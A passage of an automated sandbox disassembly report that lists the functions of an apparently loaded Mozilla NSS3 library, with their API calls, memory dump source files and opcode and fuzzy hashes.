                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE001,00000000), ref: 6BEC4DE4
                                                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6BEC4E4C
                                                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6BEC4E5B
                                                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(00000000,00000000,00000001), ref: 6BEC4E6C
                                                                                                                                                                                                                                                              • Part of subcall function 6BEC4880: PR_SetError.NSS3(FFFFE005,00000000), ref: 6BEC48A2
                                                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6BEC4EF1
                                                                                                                                                                                                                                                            • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6BEC4F02
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Util$Error$Arena$Alloc_Item_Valuememcpystrlen$CriticalEnterSectionUnlockZfree$AllocateArena_CompareCondCurrentFreeNotifyThreadfree
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 24311736-0
                                                                                                                                                                                                                                                            • Opcode ID: a35e4b687489c3855200d27d028af5178bd20b26a78d2328d6a6435bec64ffcd
                                                                                                                                                                                                                                                            • Instruction ID: 7511cced1cc1a4e0ec5cf2033d12e4e20afa95c1f721f44a964deb8c541b6928
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a35e4b687489c3855200d27d028af5178bd20b26a78d2328d6a6435bec64ffcd
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B7C151B6E003159FEB00CF78D981B9F77F8AF05718F15046AE825A7351E739E9148BA2
                                                                                                                                                                                                                                                            Function 6BEED8F0 Relevance: 27.4, APIs: 18, Instructions: 354COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(?,00000010,00000054,?,00000008,00000054,00000000), ref: 6BEEDA45
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,6BEED06D), ref: 6BEEDA59
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,6BEED06D), ref: 6BEEDA89
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,6BEED06D), ref: 6BEEDA9D
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6BEEDB0A
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6BEEDB1E
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6BEEDB43
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6BEEDB57
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(00000000,?,6BEED06D), ref: 6BEEDB7C
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,6BEED06D), ref: 6BEEDB90
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6BEEDBBD
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,6BEED06D), ref: 6BEEDC21
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(00000000,00000000,?,?,?,?), ref: 6BEEDC39
                                                                                                                                                                                                                                                            • PK11_DoesMechanism.NSS3(?,?,?,?,?,00000000,?,6BEED06D), ref: 6BEEDC64
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(?,?,?,00000000,?,6BEED06D), ref: 6BEEDC84
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,6BEED06D), ref: 6BEEDC98
                                                                                                                                                                                                                                                            • PK11_DoesMechanism.NSS3(?,CE53436C,?,?,?,?,?,00000000,?,6BEED06D), ref: 6BEEDCE6
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,6BEED06D), ref: 6BEEDD01
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CriticalEnterSectionValue$Unlock$DoesK11_Mechanism$Error
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3890939128-0
                                                                                                                                                                                                                                                            • Opcode ID: 69bf2a381861ced969c2e18ea53763f369d68a22ce8a5d37b055b0cb3a9a21b1
                                                                                                                                                                                                                                                            • Instruction ID: 149dad29fdc55b1d0fc366ad535710402a78f72d2941511aba9d69d45553b0be
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 69bf2a381861ced969c2e18ea53763f369d68a22ce8a5d37b055b0cb3a9a21b1
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 22E11638640700CFD7109F68C885B56B7F5FF89318F208968D95687761EB79F896CBA0
                                                                                                                                                                                                                                                            Function 6BF528C0 Relevance: 27.2, APIs: 18, Instructions: 230COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 6BF55B40: PR_GetIdentitiesLayer.NSS3 ref: 6BF55B56
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6BF5290A
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(00000001), ref: 6BF5291E
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6BF52937
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(00000001), ref: 6BF5294B
                                                                                                                                                                                                                                                            • PR_EnterMonitor.NSS3(?), ref: 6BF52966
                                                                                                                                                                                                                                                            • PR_EnterMonitor.NSS3(?), ref: 6BF529AC
                                                                                                                                                                                                                                                            • PR_ExitMonitor.NSS3(?), ref: 6BF529D1
                                                                                                                                                                                                                                                            • PR_EnterMonitor.NSS3(?), ref: 6BF529F0
                                                                                                                                                                                                                                                            • PR_EnterMonitor.NSS3(?), ref: 6BF52A15
                                                                                                                                                                                                                                                            • PR_EnterMonitor.NSS3(?), ref: 6BF52A37
                                                                                                                                                                                                                                                            • PR_ExitMonitor.NSS3(?), ref: 6BF52A61
                                                                                                                                                                                                                                                            • PR_ExitMonitor.NSS3(?), ref: 6BF52A78
                                                                                                                                                                                                                                                            • PR_ExitMonitor.NSS3(?), ref: 6BF52A8F
                                                                                                                                                                                                                                                            • PR_ExitMonitor.NSS3(?), ref: 6BF52AA6
                                                                                                                                                                                                                                                              • Part of subcall function 6BF89440: TlsGetValue.KERNEL32 ref: 6BF8945B
                                                                                                                                                                                                                                                              • Part of subcall function 6BF89440: TlsGetValue.KERNEL32 ref: 6BF89479
                                                                                                                                                                                                                                                              • Part of subcall function 6BF89440: EnterCriticalSection.KERNEL32 ref: 6BF89495
                                                                                                                                                                                                                                                              • Part of subcall function 6BF89440: TlsGetValue.KERNEL32 ref: 6BF894E4
                                                                                                                                                                                                                                                              • Part of subcall function 6BF89440: TlsGetValue.KERNEL32 ref: 6BF89532
                                                                                                                                                                                                                                                              • Part of subcall function 6BF89440: LeaveCriticalSection.KERNEL32 ref: 6BF8955D
                                                                                                                                                                                                                                                            • PK11_HPKE_DestroyContext.NSS3(?,00000001), ref: 6BF52AF9
                                                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6BF52B16
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6BF52B6D
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6BF52B80
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Monitor$Enter$Value$Exit$CriticalSection$Unlock$ContextDestroyIdentitiesK11_LayerLeavefree
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2841089016-0
                                                                                                                                                                                                                                                            • Opcode ID: fc9bb886f08c2d07b4b119d6efac3076436ee69ad661cd026541fc52b508753e
                                                                                                                                                                                                                                                            • Instruction ID: 05646c2035ca4fa1c7716bc50bf5aa91f340b8d8a9450a66700f473cd628a288
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fc9bb886f08c2d07b4b119d6efac3076436ee69ad661cd026541fc52b508753e
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C68197B7A007055BEB209F35DC46B97B7F5AF15308F04492CD89AC7222EB3AE525CB91
                                                                                                                                                                                                                                                            Function 6BF19890 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 273COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PORT_ArenaGrow_Util.NSS3(?,?,00000010,?,?,?,?,00000000,00000010,?,6BF12403,00000000,00000000), ref: 6BF19963
                                                                                                                                                                                                                                                            • PORT_ArenaGrow_Util.NSS3(00000000,00000000,00000000,00000007,00000000,00000010,?,6BF12403,00000000,00000000), ref: 6BF198C0
                                                                                                                                                                                                                                                              • Part of subcall function 6BF21340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6BEC895A,00000000,?,00000000,?,00000000,?,00000000,?,6BEBF599,?,00000000), ref: 6BF2136A
                                                                                                                                                                                                                                                              • Part of subcall function 6BF21340: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6BEC895A,00000000,?,00000000,?,00000000,?,00000000,?,6BEBF599,?,00000000), ref: 6BF2137E
                                                                                                                                                                                                                                                              • Part of subcall function 6BF21340: PL_ArenaGrow.NSS3(?,6BEBF599,?,00000000,?,6BEC895A,00000000,?,00000000,?,00000000,?,00000000,?,6BEBF599,?), ref: 6BF213CF
                                                                                                                                                                                                                                                              • Part of subcall function 6BF21340: PR_Unlock.NSS3(?,?,6BEC895A,00000000,?,00000000,?,00000000,?,00000000,?,6BEBF599,?,00000000), ref: 6BF2145C
                                                                                                                                                                                                                                                            • malloc.MOZGLUE(00000007,00000000,00000010,?,6BF12403,00000000,00000000), ref: 6BF198D6
                                                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6BF19B90
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-._~:[]@!$'()*+,=/?|, xrefs: 6BF19A53, 6BF19AF7
                                                                                                                                                                                                                                                            • abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-._~:[]@!$'()*+,=&, xrefs: 6BF19903, 6BF199AE
                                                                                                                                                                                                                                                            • pkcs11:, xrefs: 6BF198F5
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Arena$Grow_Util$CriticalEnterGrowSectionUnlockValuefreemalloc
                                                                                                                                                                                                                                                            • String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-._~:[]@!$'()*+,=&$abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-._~:[]@!$'()*+,=/?|$pkcs11:
                                                                                                                                                                                                                                                            • API String ID: 1150520530-890694778
                                                                                                                                                                                                                                                            • Opcode ID: a912b7316774ef2601ea94b8c88eb93bf9d966ec4c70032492e81ea2f6226ce8
                                                                                                                                                                                                                                                            • Instruction ID: cf136ecf86c3e01562a41b4423d1e640f13661f26d27b8fae692bbb51a6999fa
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a912b7316774ef2601ea94b8c88eb93bf9d966ec4c70032492e81ea2f6226ce8
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 63A18672E082069BDF04CFA5C841AAEB7B5FF44358F10C559D415A72A2EB399A06CBE1
                                                                                                                                                                                                                                                            Function 6BEE3BD0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 191COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(?,?,?,#?k,?,6BEDE4CE,?,?,?,00000001,00000000,?,?,6BEE3F23,?), ref: 6BEE3BEB
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,#?k,?,6BEDE4CE,?,?,?,00000001,00000000,?,?,6BEE3F23,?), ref: 6BEE3BFF
                                                                                                                                                                                                                                                            • PL_HashTableLookup.NSS3(?,?,?,?,?,#?k,?,6BEDE4CE,?,?,?,00000001,00000000,?,?,6BEE3F23), ref: 6BEE3C0F
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,?,?,#?k,?,6BEDE4CE,?,?,?,00000001,00000000,?), ref: 6BEE3C1C
                                                                                                                                                                                                                                                              • Part of subcall function 6BF6DD70: TlsGetValue.KERNEL32 ref: 6BF6DD8C
                                                                                                                                                                                                                                                              • Part of subcall function 6BF6DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6BF6DDB4
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,#?k,?,6BEDE4CE,?,?,?,00000001,00000000), ref: 6BEE3C5D
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,#?k,?,6BEDE4CE,?,?,?,00000001), ref: 6BEE3C71
                                                                                                                                                                                                                                                            • PL_HashTableLookup.NSS3(?,?,?,?,?,?,?,?,?,?,#?k,?,6BEDE4CE), ref: 6BEE3C81
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,#?k,?,6BEDE4CE), ref: 6BEE3C8E
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,#?k), ref: 6BEE3D1B
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6BEE3D32
                                                                                                                                                                                                                                                            • PL_HashTableLookup.NSS3(00000000,00000000), ref: 6BEE3D42
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3(00000000), ref: 6BEE3D4F
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6BE4204A), ref: 6BEB07AD
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6BE4204A), ref: 6BEB07CD
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6BE4204A), ref: 6BEB07D6
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6BE4204A), ref: 6BEB07E4
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsSetValue.KERNEL32(00000000,?,6BE4204A), ref: 6BEB0864
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6BEB0880
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsSetValue.KERNEL32(00000000,?,?,6BE4204A), ref: 6BEB08CB
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsGetValue.KERNEL32(?,?,6BE4204A), ref: 6BEB08D7
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsGetValue.KERNEL32(?,?,6BE4204A), ref: 6BEB08FB
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
                                                                                                                                                                                                                                                            • String ID: #?k
                                                                                                                                                                                                                                                            • API String ID: 2446853827-3634264330
                                                                                                                                                                                                                                                            • Opcode ID: 100455b580b9fa0c888354fde313c563d602038f19097b1497fbc9d2dbc33460
                                                                                                                                                                                                                                                            • Instruction ID: 4463041aa689cacc535e1446c6828eb823bde8712d7850c7d2bbd64f2f9142f9
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 100455b580b9fa0c888354fde313c563d602038f19097b1497fbc9d2dbc33460
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3571D179D002059FDB119F34D88596AB7B4FF04318F244568EC5897322E73AED62CBE1
                                                                                                                                                                                                                                                            Function 6BED5AE0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 184COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6BED5C1E
                                                                                                                                                                                                                                                            • PR_CallOnce.NSS3(6C022AA4,6BF212D0), ref: 6BED5C43
                                                                                                                                                                                                                                                            • PL_FreeArenaPool.NSS3(?), ref: 6BED5C5D
                                                                                                                                                                                                                                                            • PORT_NewArena_Util.NSS3(00000800), ref: 6BED5C8C
                                                                                                                                                                                                                                                            • SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,6BFEA540,?), ref: 6BED5CAB
                                                                                                                                                                                                                                                            • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6BED5CBE
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE006,00000000), ref: 6BED5CCF
                                                                                                                                                                                                                                                            • PL_FinishArenaPool.NSS3(?), ref: 6BED5CF2
                                                                                                                                                                                                                                                            • HASH_GetHashTypeByOidTag.NSS3 ref: 6BED5D00
                                                                                                                                                                                                                                                            • SECOID_FindOID_Util.NSS3(?), ref: 6BED5D16
                                                                                                                                                                                                                                                            • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6BED5D30
                                                                                                                                                                                                                                                            • HASH_GetHashTypeByOidTag.NSS3 ref: 6BED5D3A
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Util$ArenaArena_FreePool$HashType$CallDecodeErrorFindFinishInitItem_OnceQuick
                                                                                                                                                                                                                                                            • String ID: security
                                                                                                                                                                                                                                                            • API String ID: 3817386848-3315324353
                                                                                                                                                                                                                                                            • Opcode ID: 57d8763b98265bea0b94568d45af8c26b59a31869ffe16316edfd9e64e73099a
                                                                                                                                                                                                                                                            • Instruction ID: 0c57fe84771a37217945983c760b385dfed2e28b3468ca3bf7e5f38184727126
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 57d8763b98265bea0b94568d45af8c26b59a31869ffe16316edfd9e64e73099a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F251C4B19002159BEB108F64EC81B6A73E4EF06708FB40476EA04D62A1F7BDD627CF52
                                                                                                                                                                                                                                                            Function 6BF2E8C0 Relevance: 22.9, APIs: 15, Instructions: 353memoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PORT_ZAlloc_Util.NSS3(0000001C,?,6BF2E853,?,FFFFFFFF,?,?,6BF2B0CC,?,6BF2B4A0,?,00000000), ref: 6BF2E8D9
                                                                                                                                                                                                                                                              • Part of subcall function 6BF20D30: calloc.MOZGLUE ref: 6BF20D50
                                                                                                                                                                                                                                                              • Part of subcall function 6BF20D30: TlsGetValue.KERNEL32 ref: 6BF20D6D
                                                                                                                                                                                                                                                              • Part of subcall function 6BF2C6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6BF2DAE2,?), ref: 6BF2C6C2
                                                                                                                                                                                                                                                            • PORT_ArenaMark_Util.NSS3(?), ref: 6BF2E972
                                                                                                                                                                                                                                                            • PORT_ArenaMark_Util.NSS3(?), ref: 6BF2E9C2
                                                                                                                                                                                                                                                            • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6BF2EA00
                                                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,-00000007), ref: 6BF2EA3F
                                                                                                                                                                                                                                                            • SECOID_FindOIDByTag_Util.NSS3(00000010), ref: 6BF2EA5A
                                                                                                                                                                                                                                                            • SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6BF2EA81
                                                                                                                                                                                                                                                            • SECOID_SetAlgorithmID_Util.NSS3(?,?,00000010,00000000), ref: 6BF2EA9E
                                                                                                                                                                                                                                                            • SECOID_FindOIDByTag_Util.NSS3(?), ref: 6BF2EACF
                                                                                                                                                                                                                                                            • PK11_KeyGen.NSS3(00000000,-00000001,00000000,?,00000000), ref: 6BF2EB56
                                                                                                                                                                                                                                                            • PK11_FreeSymKey.NSS3(00000000), ref: 6BF2EBC2
                                                                                                                                                                                                                                                            • SECOID_FindOID_Util.NSS3(?), ref: 6BF2EBEC
                                                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6BF2EC58
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Util$Find$ArenaTag_$AlgorithmAlloc_K11_Mark_$DestroyFreePublicValuecallocfree
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 759478663-0
                                                                                                                                                                                                                                                            • Opcode ID: 06aece33b92efe5bce789998aba5bfd907b613abccd069c93c813a0a627f7ffe
                                                                                                                                                                                                                                                            • Instruction ID: b03343ab2e5934d75a47fed857ceb2700d0108378418ad99222f90e7e9d15f0f
